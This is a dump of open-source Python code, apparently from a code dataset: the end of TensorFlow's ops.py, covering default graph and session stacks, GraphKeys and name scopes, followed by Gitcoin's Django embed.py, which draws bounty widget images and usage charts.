""" if context.in_graph_mode(): return get_default_graph().control_dependencies(control_inputs) else: return _NullContextmanager() class _DefaultStack(threading.local): """A thread-local stack of objects for providing implicit defaults.""" def __init__(self): super(_DefaultStack, self).__init__() self._enforce_nesting = True self.stack = [] def get_default(self): return self.stack[-1] if len(self.stack) >= 1 else None def reset(self): self.stack = [] def is_cleared(self): return not self.stack @property def enforce_nesting(self): return self._enforce_nesting @enforce_nesting.setter def enforce_nesting(self, value): self._enforce_nesting = value @tf_contextlib.contextmanager def get_controller(self, default): """A context manager for manipulating a default stack.""" try: self.stack.append(default) yield default finally: # stack may be empty if reset() was called if self.stack: if self._enforce_nesting: if self.stack[-1] is not default: raise AssertionError( "Nesting violated for default stack of %s objects" % type(default)) self.stack.pop() else: self.stack.remove(default) _default_session_stack = _DefaultStack() # pylint: disable=protected-access def default_session(session): """Python "with" handler for defining a default session. This function provides a means of registering a session for handling Tensor.eval() and Operation.run() calls. It is primarily intended for use by session.Session, but can be used with any object that implements the Session.run() interface. Use with the "with" keyword to specify that Tensor.eval() and Operation.run() invocations within the scope of a block should be executed by a particular session. The default session applies to the current thread only, so it is always possible to inspect the call stack and determine the scope of a default session. If you create a new thread, and wish to use the default session in that thread, you must explicitly add a "with ops.default_session(sess):" block in that thread's function. 
Example: The following code examples are equivalent: # 1. Using the Session object directly: sess = ... c = tf.constant(5.0) sess.run(c) # 2. Using default_session(): sess = ... with ops.default_session(sess): c = tf.constant(5.0) result = c.eval() # 3. Overriding default_session(): sess = ... with ops.default_session(sess): c = tf.constant(5.0) with ops.default_session(...): c.eval(session=sess) Args: session: The session to be installed as the default session. Returns: A context manager for the default session. """ return _default_session_stack.get_controller(session) def get_default_session(): """Returns the default session for the current thread. The returned `Session` will be the innermost session on which a `Session` or `Session.as_default()` context has been entered. NOTE: The default session is a property of the current thread. If you create a new thread, and wish to use the default session in that thread, you must explicitly add a `with sess.as_default():` in that thread's function. Returns: The default `Session` being used in the current thread. """ return _default_session_stack.get_default() def _eval_using_default_session(tensors, feed_dict, graph, session=None): """Uses the default session to evaluate one or more tensors. Args: tensors: A single Tensor, or a list of Tensor objects. feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists, numpy ndarrays, TensorProtos, or strings. graph: The graph in which the tensors are defined. session: (Optional) A different session to use to evaluate "tensors". Returns: Either a single numpy ndarray if "tensors" is a single tensor; or a list of numpy ndarrays that each correspond to the respective element in "tensors". Raises: ValueError: If no default session is available; the default session does not have "graph" as its graph; or if "session" is specified, and it does not have "graph" as its graph. 
""" if session is None: session = get_default_session() if session is None: raise ValueError("Cannot evaluate tensor using `eval()`: No default " "session is registered. Use `with " "sess.as_default()` or pass an explicit session to " "`eval(session=sess)`") if session.graph is not graph: raise ValueError("Cannot use the default session to evaluate tensor: " "the tensor's graph is different from the session's " "graph. Pass an explicit session to " "`eval(session=sess)`.") else: if session.graph is not graph: raise ValueError("Cannot use the given session to evaluate tensor: " "the tensor's graph is different from the session's " "graph.") return session.run(tensors, feed_dict) def _run_using_default_session(operation, feed_dict, graph, session=None): """Uses the default session to run "operation". Args: operation: The Operation to be run. feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists, numpy ndarrays, TensorProtos, or strings. graph: The graph in which "operation" is defined. session: (Optional) A different session to use to run "operation". Raises: ValueError: If no default session is available; the default session does not have "graph" as its graph; or if "session" is specified, and it does not have "graph" as its graph. """ if session is None: session = get_default_session() if session is None: raise ValueError("Cannot execute operation using `run()`: No default " "session is registered. Use `with " "sess.as_default():` or pass an explicit session to " "`run(session=sess)`") if session.graph is not graph: raise ValueError("Cannot use the default session to execute operation: " "the operation's graph is different from the " "session's graph. 
Pass an explicit session to " "run(session=sess).") else: if session.graph is not graph: raise ValueError("Cannot use the given session to execute operation: " "the operation's graph is different from the session's " "graph.") session.run(operation, feed_dict) class _DefaultGraphStack(_DefaultStack): # pylint: disable=protected-access """A thread-local stack of objects for providing an implicit default graph.""" def __init__(self): super(_DefaultGraphStack, self).__init__() self._global_default_graph = None def get_default(self): """Override that returns a global default if the stack is empty.""" ret = super(_DefaultGraphStack, self).get_default() if ret is None: ret = self._GetGlobalDefaultGraph() return ret def _GetGlobalDefaultGraph(self): if self._global_default_graph is None: # TODO(mrry): Perhaps log that the default graph is being used, or set # provide some other feedback to prevent confusion when a mixture of # the global default graph and an explicit graph are combined in the # same process. self._global_default_graph = Graph() return self._global_default_graph def reset(self): super(_DefaultGraphStack, self).reset() self._global_default_graph = None _default_graph_stack = _DefaultGraphStack() def enable_eager_execution(config=None, device_policy=None): """Enables, for the rest of the lifetime of this program, eager execution. If not called immediately on startup risks creating breakage and bugs. Example: ```python tfe.enable_eager_execution() # After eager execution is enabled, operations are executed as they are # defined and `Tensor`s hold concrete values, which can be accessed as # `numpy.ndarray`s through the `numpy()` method. assert tf.multiply(6, 7).numpy() == 42 ``` Args: config: (Optional.) A `ConfigProto` protocol buffer with configuration options for the Context. Note that a lot of these options may be currently unimplemented or irrelevant when eager execution is enabled. device_policy: (Optional.) 
     What policy to use when trying to run an
     operation on a device with inputs which are not on that device.
     Valid values:
       tfe.DEVICE_PLACEMENT_EXPLICIT: raises an error if the placement is not
         correct.
       tfe.DEVICE_PLACEMENT_WARN: copies the tensors which are not on the
         right device but raises a warning.
       tfe.DEVICE_PLACEMENT_SILENT: silently copies the tensors. This might
         hide performance problems.

  Raises:
    ValueError: If trying to create a context after using graph operations
     or if trying to create a context with nontrivial options which differ
     from those of the existing context.
  """
  # pylint: disable=protected-access
  if context._default_mode == context.GRAPH_MODE:
    # Refuse to switch modes once any graph-mode state exists: a registered
    # default session or a materialized global default graph.
    graph_mode_has_been_used = (
        _default_session_stack.stack
        or _default_graph_stack._global_default_graph is not None)
    if graph_mode_has_been_used:
      raise ValueError(
          "tfe.enable_eager_execution has to be called at program startup.")
  context._default_mode = context.EAGER_MODE
  if context._context is None:
    context._context = context.Context(config=config,
                                       device_policy=device_policy)
  elif ((config is not None and config is not context._context._config)
        or (device_policy is not None
            and device_policy is not context._context._device_policy)):
    raise ValueError("Trying to change the options of an active eager"
                     " execution. Context config: %s, specified config:"
                     " %s. Context device policy: %s; specified device"
                     " policy: %s." % (config, context._context._config,
                                       device_policy,
                                       context._context._device_policy))


def eager_run(main=None, argv=None):
  """Runs the program with an optional main function and argv list.

  The program will run with eager execution enabled.

  Example:
  ```python
  import tensorflow as tf
  # Import subject to future changes:
  from tensorflow.contrib.eager.python import tfe

  def main(_):
    u = tf.constant(6.0)
    v = tf.constant(7.0)
    print(u * v)

  if __name__ == "__main__":
    tfe.run()
  ```

  Args:
    main: the main function to run.
    argv: the arguments to pass to it.
  """
  enable_eager_execution()
  app.run(main, argv)


def reset_default_graph():
  """Clears the default graph stack and resets the global default graph.

  NOTE: The default graph is a property of the current thread. This
  function applies only to the current thread.  Calling this function while
  a `tf.Session` or `tf.InteractiveSession` is active will result in undefined
  behavior. Using any previously created `tf.Operation` or `tf.Tensor` objects
  after calling this function will result in undefined behavior.

  Raises:
    AssertionError: If this function is called within a nested graph.
  """
  if not _default_graph_stack.is_cleared():
    raise AssertionError("Do not use tf.reset_default_graph() to clear "
                         "nested graphs. If you need a cleared graph, "
                         "exit the nesting and create a new graph.")
  _default_graph_stack.reset()


def get_default_graph():
  """Returns the default graph for the current thread.

  The returned graph will be the innermost graph on which a
  `Graph.as_default()` context has been entered, or a global default
  graph if none has been explicitly created.

  NOTE: The default graph is a property of the current thread. If you
  create a new thread, and wish to use the default graph in that
  thread, you must explicitly add a `with g.as_default():` in that
  thread's function.

  Returns:
    The default `Graph` being used in the current thread.
  """
  return _default_graph_stack.get_default()


def get_name_scope():
  """Returns the current name scope in the default_graph.

  For example:

  ```python
  with tf.name_scope('scope1'):
    with tf.name_scope('scope2'):
      print(tf.get_name_scope())
  ```
  would print the string `scope1/scope2`.

  Returns:
    A string representing the current name scope.
  """
  return get_default_graph().get_name_scope()


def _assert_same_graph(original_item, item):
  """Fail if the 2 items are from different graphs.

  Args:
    original_item: Original item to check against.
    item: Item to check.

  Raises:
    ValueError: if graphs do not match.
  """
  if original_item.graph is not item.graph:
    raise ValueError("%s must be from the same graph as %s." % (item,
                                                                original_item))


def _get_graph_from_inputs(op_input_list, graph=None):
  """Returns the appropriate graph to use for the given inputs.

  This library method provides a consistent algorithm for choosing the graph
  in which an Operation should be constructed:

  1. If the default graph is being used to construct a function, we
     use the default graph.
  2. If the "graph" is specified explicitly, we validate that all of the inputs
     in "op_input_list" are compatible with that graph.
  3. Otherwise, we attempt to select a graph from the first Operation-
     or Tensor-valued input in "op_input_list", and validate that all other
     such inputs are in the same graph.
  4. If the graph was not specified and it could not be inferred from
     "op_input_list", we attempt to use the default graph.

  Args:
    op_input_list: A list of inputs to an operation, which may include
      `Tensor`, `Operation`, and other objects that may be converted to a
      graph element.
    graph: (Optional) The explicit graph to use.

  Raises:
    TypeError: If op_input_list is not a list or tuple, or if graph is not a
      Graph.
    ValueError: If a graph is explicitly passed and not all inputs are from it,
      or if the inputs are from multiple graphs, or we could not find a graph
      and there was no default graph.

  Returns:
    The appropriate graph to use for the given inputs.
  """
  if get_default_graph().building_function:
    return get_default_graph()

  op_input_list = tuple(op_input_list)  # Handle generators correctly
  if graph and not isinstance(graph, Graph):
    raise TypeError("Input graph needs to be a Graph: %s" % graph)

  # 1. We validate that all of the inputs are from the same graph. This is
  #    either the supplied graph parameter, or the first one selected from one
  #    the graph-element-valued inputs. In the latter case, we hold onto
  #    that input in original_graph_element so we can provide a more
  #    informative error if a mismatch is found.
  original_graph_element = None
  for op_input in op_input_list:
    # Determine if this is a valid graph_element.
    # TODO(josh11b): Note that we exclude subclasses of Tensor. Need to clean this
    # up.
    graph_element = None
    if (isinstance(op_input, (Operation, _TensorLike)) and
        ((not isinstance(op_input, Tensor)) or
         type(op_input) == Tensor)):  # pylint: disable=unidiomatic-typecheck
      graph_element = op_input
    else:
      graph_element = _as_graph_element(op_input)

    if graph_element is not None:
      if not graph:
        # First graph-valued input fixes the graph for all the rest.
        original_graph_element = graph_element
        graph = graph_element.graph
      elif original_graph_element is not None:
        _assert_same_graph(original_graph_element, graph_element)
      elif graph_element.graph is not graph:
        raise ValueError("%s is not from the passed-in graph." % graph_element)

  # 2. If all else fails, we use the default graph, which is always there.
  return graph or get_default_graph()


class GraphKeys(object):
  """Standard names to use for graph collections.

  The standard library uses various well-known names to collect and
  retrieve values associated with a graph. For example, the
  `tf.Optimizer` subclasses default to optimizing the variables
  collected under `tf.GraphKeys.TRAINABLE_VARIABLES` if none is
  specified, but it is also possible to pass an explicit list of
  variables.

  The following standard keys are defined:

  * `GLOBAL_VARIABLES`: the default collection of `Variable` objects, shared
    across distributed environment (model variables are subset of these). See
    @{tf.global_variables}
    for more details.
    Commonly, all `TRAINABLE_VARIABLES` variables will be in `MODEL_VARIABLES`,
    and all `MODEL_VARIABLES` variables will be in `GLOBAL_VARIABLES`.
  * `LOCAL_VARIABLES`: the subset of `Variable` objects that are local to each
    machine. Usually used for temporary variables, like counters.
    Note: use `tf.contrib.framework.local_variable` to add to this collection.
  * `MODEL_VARIABLES`: the subset of `Variable` objects that are used in the
    model for inference (feed forward).
    Note: use `tf.contrib.framework.model_variable` to add to this
    collection.
  * `TRAINABLE_VARIABLES`: the subset of `Variable` objects that will
    be trained by an optimizer. See
    @{tf.trainable_variables}
    for more details.
  * `SUMMARIES`: the summary `Tensor` objects that have been created in the
    graph. See
    @{tf.summary.merge_all}
    for more details.
  * `QUEUE_RUNNERS`: the `QueueRunner` objects that are used to
    produce input for a computation. See
    @{tf.train.start_queue_runners}
    for more details.
  * `MOVING_AVERAGE_VARIABLES`: the subset of `Variable` objects that will also
    keep moving averages.  See
    @{tf.moving_average_variables}
    for more details.
  * `REGULARIZATION_LOSSES`: regularization losses collected during graph
    construction.

  The following standard keys are _defined_, but their collections are **not**
  automatically populated as many of the others are:

  * `WEIGHTS`
  * `BIASES`
  * `ACTIVATIONS`
  """

  # Key to collect Variable objects that are global (shared across machines).
  # Default collection for all variables, except local ones.
  GLOBAL_VARIABLES = "variables"
  # Key to collect local variables that are local to the machine and are not
  # saved/restored.
  LOCAL_VARIABLES = "local_variables"
  # Key to collect local variables which are used to accumulate internal state
  # to be used in tf.metrics.*.
  METRIC_VARIABLES = "metric_variables"
  # Key to collect model variables defined by layers.
  MODEL_VARIABLES = "model_variables"
  # Key to collect Variable objects that will be trained by the
  # optimizers.
  TRAINABLE_VARIABLES = "trainable_variables"
  # Key to collect summaries.
  SUMMARIES = "summaries"
  # Key to collect QueueRunners.
  QUEUE_RUNNERS = "queue_runners"
  # Key to collect table initializers.
  TABLE_INITIALIZERS = "table_initializer"
  # Key to collect asset filepaths. An asset represents an external resource
  # like a vocabulary file.
  ASSET_FILEPATHS = "asset_filepaths"
  # Key to collect Variable objects that keep moving averages.
  MOVING_AVERAGE_VARIABLES = "moving_average_variables"
  # Key to collect regularization losses at graph construction.
  REGULARIZATION_LOSSES = "regularization_losses"
  # Key to collect concatenated sharded variables.
  CONCATENATED_VARIABLES = "concatenated_variables"
  # Key to collect savers.
  SAVERS = "savers"
  # Key to collect weights
  WEIGHTS = "weights"
  # Key to collect biases
  BIASES = "biases"
  # Key to collect activations
  ACTIVATIONS = "activations"
  # Key to collect update_ops
  UPDATE_OPS = "update_ops"
  # Key to collect losses
  LOSSES = "losses"
  # Key to collect BaseSaverBuilder.SaveableObject instances for checkpointing.
  SAVEABLE_OBJECTS = "saveable_objects"
  # Key to collect all shared resources used by the graph which need to be
  # initialized once per cluster.
  RESOURCES = "resources"
  # Key to collect all shared resources used in this graph which need to be
  # initialized once per session.
  LOCAL_RESOURCES = "local_resources"
  # Trainable resource-style variables.
  TRAINABLE_RESOURCE_VARIABLES = "trainable_resource_variables"

  # Key to indicate various ops.
  INIT_OP = "init_op"
  LOCAL_INIT_OP = "local_init_op"
  READY_OP = "ready_op"
  READY_FOR_LOCAL_INIT_OP = "ready_for_local_init_op"
  SUMMARY_OP = "summary_op"
  GLOBAL_STEP = "global_step"

  # Used to count the number of evaluations performed during a single
  # evaluation run.
  EVAL_STEP = "eval_step"
  TRAIN_OP = "train_op"

  # Key for control flow context.
  COND_CONTEXT = "cond_context"
  WHILE_CONTEXT = "while_context"

  # List of all collections that keep track of variables.
  _VARIABLE_COLLECTIONS = [
      GLOBAL_VARIABLES,
      LOCAL_VARIABLES,
      METRIC_VARIABLES,
      MODEL_VARIABLES,
      TRAINABLE_VARIABLES,
      MOVING_AVERAGE_VARIABLES,
      CONCATENATED_VARIABLES,
      TRAINABLE_RESOURCE_VARIABLES,
  ]

  # Key for streaming model ports.
  # NOTE(yuanbyu): internal and experimental.
  _STREAMING_MODEL_PORTS = "streaming_model_ports"

  @decorator_utils.classproperty
  def VARIABLES(cls):  # pylint: disable=no-self-argument
    # Deprecated alias for GLOBAL_VARIABLES; warns once per process.
    logging.log_first_n(logging.WARN,
                        "VARIABLES collection name is deprecated, please use "
                        "GLOBAL_VARIABLES instead; VARIABLES will be removed "
                        "after 2017-03-02.", 1)
    return cls.GLOBAL_VARIABLES


def add_to_collection(name, value):
  """Wrapper for `Graph.add_to_collection()` using the default graph.

  See @{tf.Graph.add_to_collection}
  for more details.

  Args:
    name: The key for the collection. For example, the `GraphKeys` class
      contains many standard names for collections.
    value: The value to add to the collection.

  @compatibility(eager)
  Collections are not supported when eager execution is enabled.
  @end_compatibility
  """
  get_default_graph().add_to_collection(name, value)


def add_to_collections(names, value):
  """Wrapper for `Graph.add_to_collections()` using the default graph.

  See @{tf.Graph.add_to_collections}
  for more details.

  Args:
    names: The key for the collections. The `GraphKeys` class
      contains many standard names for collections.
    value: The value to add to the collections.

  @compatibility(eager)
  Collections are not supported when eager execution is enabled.
  @end_compatibility
  """
  get_default_graph().add_to_collections(names, value)


def get_collection_ref(key):
  """Wrapper for `Graph.get_collection_ref()` using the default graph.

  See @{tf.Graph.get_collection_ref}
  for more details.

  Args:
    key: The key for the collection. For example, the `GraphKeys` class
      contains many standard names for collections.

  Returns:
    The list of values in the collection with the given `name`, or an empty
    list if no value has been added to that collection.  Note that this returns
    the collection list itself, which can be modified in place to change the
    collection.

  @compatibility(eager)
  Collections are not supported when eager execution is enabled.
@end_compatibility """ return get_default_graph().get_collection_ref(key) def get_collection(key, scope=None): """Wrapper for `Graph.get_collection()` using the default graph. See @{tf.Graph.get_collection} for more details. Args: key: The key for the collection. For example, the `GraphKeys` class contains many standard names for collections. scope: (Optional.) If supplied, the resulting list is filtered to include only items whose `name` attribute matches using `re.match`. Items without a `name` attribute are never returned if a scope is supplied and the choice or `re.match` means that a `scope` without special tokens filters by prefix. Returns: The list of values in the collection with the given `name`, or an empty list if no value has been added to that collection. The list contains the values in the order under which they were collected. @compatibility(eager) Collections are not supported when eager execution is enabled. @end_compatibility """ return get_default_graph().get_collection(key, scope) def get_all_collection_keys(): """Returns a list of collections used in the default graph.""" return get_default_graph().get_all_collection_keys() # Named like a function for backwards compatibility with the # @tf_contextlib.contextmanager version, which was switched to a class to avoid # some object creation overhead. class name_scope(object): # pylint: disable=invalid-name """A context manager for use when defining a Python op. This context manager validates that the given `values` are from the same graph, makes that graph the default graph, and pushes a name scope in that graph (see @{tf.Graph.name_scope} for more details on that). For example, to define a new Python op called `my_op`: ```python def my_op(a, b, c, name=None): with tf.name_scope(name, "MyOp", [a, b, c]) as scope: a = tf.convert_to_tensor(a, name="a") b = tf.convert_to_tensor(b, name="b") c = tf.convert_to_tensor(c, name="c") # Define some computation that uses `a`, `b`, and `c`. 
return foo_op(..., name=scope) ``` """ @property def name(self): return self._name def __init__(self, name, default_name=None, values=None): """Initialize the context manager. Args: name: The name argument that is passed to the op function. default_name: The default name to use if the `name` argument is `None`. values: The list of `Tensor` arguments that are passed to the op function. """ self._name = default_name if name is None else name self._default_name = default_name self._values = values self._ctx = context.context() self._in_eager_mode = self._ctx.in_eager_mode() def __enter__(self): """Start the scope block. Returns: The scope name. Raises: ValueError: if neither `name` nor `default_name` is provided but `values` are. """ if self._in_eager_mode: self._old_name = self._ctx.scope_name if self._name: scope_name = (self._old_name + self._name + "/" if self._old_name else self._name + "/") else: scope_name = "" self._ctx.scope_name = scope_name return scope_name else: if self._name is None and self._values is not None: # We only raise an error if values is not None (provided) because # currently tf.name_scope(None) (values=None then) is sometimes used as # an idiom to reset to top scope. raise ValueError( "At least one of name (%s) and default_name (%s) must be provided." % (self._name, self._default_name)) if self._values is None: self._values = [] g = _get_graph_from_inputs(self._values) self._g_manager = g.as_default() self._g_manager.__enter__() self._name_scope = g.name_scope(self._name) return self._name_scope.__enter__() def __exit__(self, type_arg, value_arg, traceback_arg): if self._in_eager_mode: self._ctx.scope_name = self._old_name else: self._name_scope.__exit__(type_arg, value_arg, traceback_arg) self._g_manager.__exit__(type_arg, value_arg, traceback_arg) return False # False values do not suppress exceptions def strip_name_scope(name, export_scope): """Removes name scope from a name. Args: name: A `string` name. export_scope: Optional `string`. 
Name scope to remove. Returns: Name with name scope removed, or the original name if export_scope is None. """ if export_scope: try: # Strips export_scope/, export_scope///, # ^export_scope/, loc:@export_scope/. str_to_replace = r"([\^]|loc:@|^)" + export_scope + r"[\/]+(.*)" return re.sub(str_to_replace, r"\1\2", compat.as_str(name), count=1) except TypeError as e: # If the name is not of a type we can process, simply return it. logging.warning(e) return name else: return name def prepend_name_scope(name, import_scope): """Prepends name scope to a name. Args: name: A `string` name. import_scope: Optional `string`. Name scope to add. Returns: Name with name scope added, or the original name if import_scope is None. """ if import_scope: try: str_to_replace = r"([\^]|loc:@|^)(.*)" return re.sub(str_to_replace, r"\1" + import_scope + r"/\2", compat.as_str(name)) except TypeError as e: # If the name is not of a type we can process, simply return it. logging.warning(e) return name else: return name # pylint: disable=g-doc-return-or-yield # pylint: disable=not-context-manager @tf_contextlib.contextmanager def op_scope(values, name, default_name=None): """DEPRECATED. Same as name_scope above, just different argument order.""" logging.warn("tf.op_scope(values, name, default_name) is deprecated," " use tf.name_scope(name, default_name, values)") with name_scope(name, default_name=default_name, values=values) as scope: yield scope _proto_function_registry = registry.Registry("proto functions") def register_proto_function(collection_name, proto_type=None, to_proto=None, from_proto=None): """Registers `to_proto` and `from_proto` functions for collection_name. `to_proto` function converts a Python object to the corresponding protocol buffer, and returns the protocol buffer. `from_proto` function converts protocol buffer into a Python object, and returns the object.. Args: collection_name: Name of the collection. 
proto_type: Protobuf type, such as `saver_pb2.SaverDef`, `variable_pb2.VariableDef`, `queue_runner_pb2.QueueRunnerDef`.. to_proto: Function that implements Python object to protobuf conversion. from_proto: Function that implements protobuf to Python object conversion. """ if to_proto and not callable(to_proto): raise TypeError("to_proto must be callable.") if from_proto and not callable(from_proto): raise TypeError("from_proto must be callable.") _proto_function_registry.register((proto_type, to_proto, from_proto), collection_name) def get_collection_proto_type(collection_name): """Returns the proto_type for collection_name.""" try: return _proto_function_registry.lookup(collection_name)[0] except LookupError: return None def get_to_proto_function(collection_name): """Returns the to_proto function for collection_name.""" try: return _proto_function_registry.lookup(collection_name)[1] except LookupError: return None def get_from_proto_function(collection_name): """Returns the from_proto function for collection_name.""" try: return _proto_function_registry.lookup(collection_name)[2] except LookupError: return None def _assert_collection_is_ok(collection_name): if context.in_eager_mode(): if collection_name in GraphKeys._VARIABLE_COLLECTIONS: # pylint: disable=protected-access raise ValueError("When Eager Execution is enabled, variable " "collections are not supported.") def _operation_conversion_error(op, dtype=None, name=None, as_ref=False): """Produce a nice error if someone converts an Operation to a Tensor.""" raise TypeError(("Can't convert Operation '%s' to Tensor " "(target dtype=%r, name=%r, as_ref=%r)") % (op.name, dtype, name, as_ref)) register_tensor_conversion_function(Operation, _operation_conversion_error)
apache-2.0
gitcoinco/web
app/dashboard/embed.py
1
10901
from django.http import HttpResponse, JsonResponse from django.template import loader from django.utils import timezone from django.utils.cache import patch_response_headers import requests from dashboard.models import Bounty from git.utils import get_user, org_name from PIL import Image, ImageDraw, ImageFont from ratelimit.decorators import ratelimit AVATAR_BASE = 'assets/other/avatars/' def wrap_text(text, w=30): new_text = "" new_sentence = "" for word in text.split(" "): delim = " " if new_sentence != "" else "" new_sentence = new_sentence + delim + word if len(new_sentence) > w: new_text += "\n" + new_sentence new_sentence = "" new_text += "\n" + new_sentence return new_text def summarize_bounties(bounties): val_usdt = sum(bounties.values_list('_val_usd_db', flat=True)) if val_usdt < 1: return False, "" currency_to_value = {bounty.token_name: 0.00 for bounty in bounties} for bounty in bounties: currency_to_value[bounty.token_name] += float(bounty.value_true) other_values = ", ".join([ f"{round(value, 2)} {token_name}" for token_name, value in currency_to_value.items() ]) is_plural = 's' if bounties.count() > 1 else '' return True, f"Total: {bounties.count()} issue{is_plural}, {val_usdt} USD, {other_values}" @ratelimit(key='ip', rate='50/m', method=ratelimit.UNSAFE, block=True) def stat(request, key): from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas from matplotlib.figure import Figure from matplotlib.dates import DateFormatter from marketing.models import Stat limit = 10 weekly_stats = Stat.objects.filter(key=key).order_by('created_on') # weekly stats only weekly_stats = weekly_stats.filter( created_on__hour=1, created_on__week_day=1 ).filter( created_on__gt=(timezone.now() - timezone.timedelta(weeks=7)) ) daily_stats = Stat.objects.filter(key=key) \ .filter( created_on__gt=(timezone.now() - timezone.timedelta(days=7)) ).order_by('created_on') daily_stats = daily_stats.filter(created_on__hour=1) # daily stats only stats = 
weekly_stats if weekly_stats.count() < limit else daily_stats fig = Figure(figsize=(1.6, 1.5), dpi=80, facecolor='w', edgecolor='k') ax = fig.add_subplot(111) x = [] y = [] for stat in stats: x.append(stat.created_on) y.append(stat.val) x = x[-1 * limit:] y = y[-1 * limit:] ax.plot_date(x, y, '-') ax.set_axis_off() ax.xaxis.set_major_formatter(DateFormatter('%Y-%m-%d')) if stats.count() > 1: ax.set_title("Usage over time", y=0.9) else: ax.set_title("(Not enough data)", y=0.3) fig.autofmt_xdate() canvas = FigureCanvas(fig) response = HttpResponse(content_type='image/png') canvas.print_png(response) return response @ratelimit(key='ip', rate='50/m', method=ratelimit.UNSAFE, block=True) def embed(request): # default response could_not_find = Image.new('RGBA', (1, 1), (0, 0, 0, 0)) err_response = HttpResponse(content_type="image/jpeg") could_not_find.save(err_response, "JPEG") # Get maxAge GET param if provided, else default on the small side max_age = int(request.GET.get('maxAge', 3600)) # params repo_url = request.GET.get('repo', False) if not repo_url or 'github.com' not in repo_url: return err_response try: badge = request.GET.get('badge', False) if badge: open_bounties = Bounty.objects.current() \ .filter( github_url__startswith=repo_url, network='mainnet', idx_status__in=['open'] ) tmpl = loader.get_template('svg_badge.txt') response = HttpResponse( tmpl.render({'bounties_count': open_bounties.count()}), content_type='image/svg+xml', ) patch_response_headers(response, cache_timeout=max_age) return response # get avatar of repo _org_name = org_name(repo_url) avatar = None filename = f"{_org_name}.png" filepath = 'assets/other/avatars/' + filename try: avatar = Image.open(filepath, 'r').convert("RGBA") except IOError: remote_user = get_user(_org_name) if not remote_user.get('avatar_url', False): return JsonResponse({'msg': 'invalid user'}, status=422) remote_avatar_url = remote_user['avatar_url'] r = requests.get(remote_avatar_url, stream=True) chunk_size = 20000 
with open(filepath, 'wb') as fd: for chunk in r.iter_content(chunk_size): fd.write(chunk) avatar = Image.open(filepath, 'r').convert("RGBA") # make transparent datas = avatar.getdata() new_data = [] for item in datas: if item[0] == 255 and item[1] == 255 and item[2] == 255: new_data.append((255, 255, 255, 0)) else: new_data.append(item) avatar.putdata(new_data) avatar.save(filepath, "PNG") # get issues length = request.GET.get('len', 10) super_bounties = Bounty.objects.current() \ .filter( github_url__startswith=repo_url, network='mainnet', idx_status__in=['open', 'started', 'submitted'] ).order_by('-_val_usd_db') bounties = super_bounties[:length] # config bounty_height = 200 bounty_width = 572 font = 'assets/v2/fonts/futura/FuturaStd-Medium.otf' width = 1776 height = 576 # setup img = Image.new("RGBA", (width, height), (255, 255, 255)) draw = ImageDraw.Draw(img) black = (0, 0, 0) gray = (102, 102, 102) h1 = ImageFont.truetype(font, 36, encoding="unic") h2_thin = ImageFont.truetype(font, 36, encoding="unic") p = ImageFont.truetype(font, 24, encoding="unic") # background background_image = 'assets/v2/images/embed-widget/background.png' back = Image.open(background_image, 'r').convert("RGBA") offset = 0, 0 img.paste(back, offset) # repo logo icon_size = (184, 184) avatar.thumbnail(icon_size, Image.ANTIALIAS) offset = 195, 148 img.paste(avatar, offset, avatar) img_org_name = ImageDraw.Draw(img) img_org_name_size = img_org_name.textsize(_org_name, h1) img_org_name.multiline_text( align="left", xy=(287 - img_org_name_size[0] / 2, 360), text=_org_name, fill=black, font=h1, ) draw.multiline_text( align="left", xy=(110, 410), text="supports funded issues", fill=black, font=h1, ) # put bounty list in there i = 0 for bounty in bounties[:4]: i += 1 # execute line_size = 2 # Limit text to 28 chars text = f"{bounty.title_or_desc}" text = (text[:28] + '...') if len(text) > 28 else text x = 620 + (int((i-1)/line_size) * (bounty_width)) y = 230 + (abs(i % line_size-1) * 
bounty_height) draw.multiline_text(align="left", xy=(x, y), text=text, fill=black, font=h2_thin) unit = 'day' num = int(round((bounty.expires_date - timezone.now()).days, 0)) if num == 0: unit = 'hour' num = int(round((bounty.expires_date - timezone.now()).seconds / 3600 / 24, 0)) unit = unit + ("s" if num != 1 else "") draw.multiline_text( align="left", xy=(x, y - 40), text=f"Expires in {num} {unit}:", fill=gray, font=p, ) bounty_eth_background = Image.new("RGBA", (200, 56), (231, 240, 250)) bounty_usd_background = Image.new("RGBA", (200, 56), (214, 251, 235)) img.paste(bounty_eth_background, (x, y + 50)) img.paste(bounty_usd_background, (x + 210, y + 50)) tmp = ImageDraw.Draw(img) bounty_value_size = tmp.textsize(f"{round(bounty.value_true, 2)} {bounty.token_name}", p) draw.multiline_text( align="left", xy=(x + 100 - bounty_value_size[0]/2, y + 67), text=f"{round(bounty.value_true, 2)} {bounty.token_name}", fill=(44, 35, 169), font=p, ) bounty_value_size = tmp.textsize(f"{round(bounty.value_in_usdt_now, 2)} USD", p) draw.multiline_text( align="left", xy=(x + 310 - bounty_value_size[0]/2, y + 67), text=f"{round(bounty.value_in_usdt_now, 2)} USD", fill=(45, 168, 116), font=p, ) # blank slate if bounties.count() == 0: draw.multiline_text( align="left", xy=(760, 320), text="No active issues. 
Post a funded issue at: https://gitcoin.co", fill=gray, font=h1, ) if bounties.count() != 0: text = 'Browse issues at: https://gitcoin.co/explorer' draw.multiline_text( align="left", xy=(64, height - 70), text=text, fill=gray, font=p, ) draw.multiline_text( align="left", xy=(624, 120), text="Recently funded issues:", fill=(62, 36, 251), font=p, ) _, value = summarize_bounties(super_bounties) value_size = tmp.textsize(value, p) draw.multiline_text( align="left", xy=(1725 - value_size[0], 120), text=value, fill=gray, font=p, ) line_table_header = Image.new("RGBA", (1100, 6), (62, 36, 251)) img.paste(line_table_header, (624, 155)) # Resize back to output size for better anti-alias img = img.resize((888, 288), Image.LANCZOS) # Return image with right content-type response = HttpResponse(content_type="image/png") img.save(response, "PNG") patch_response_headers(response, cache_timeout=max_age) return response except IOError as e: print(e) return err_response
agpl-3.0
blademainer/intellij-community
python/helpers/epydoc/docwriter/html.py
89
143938
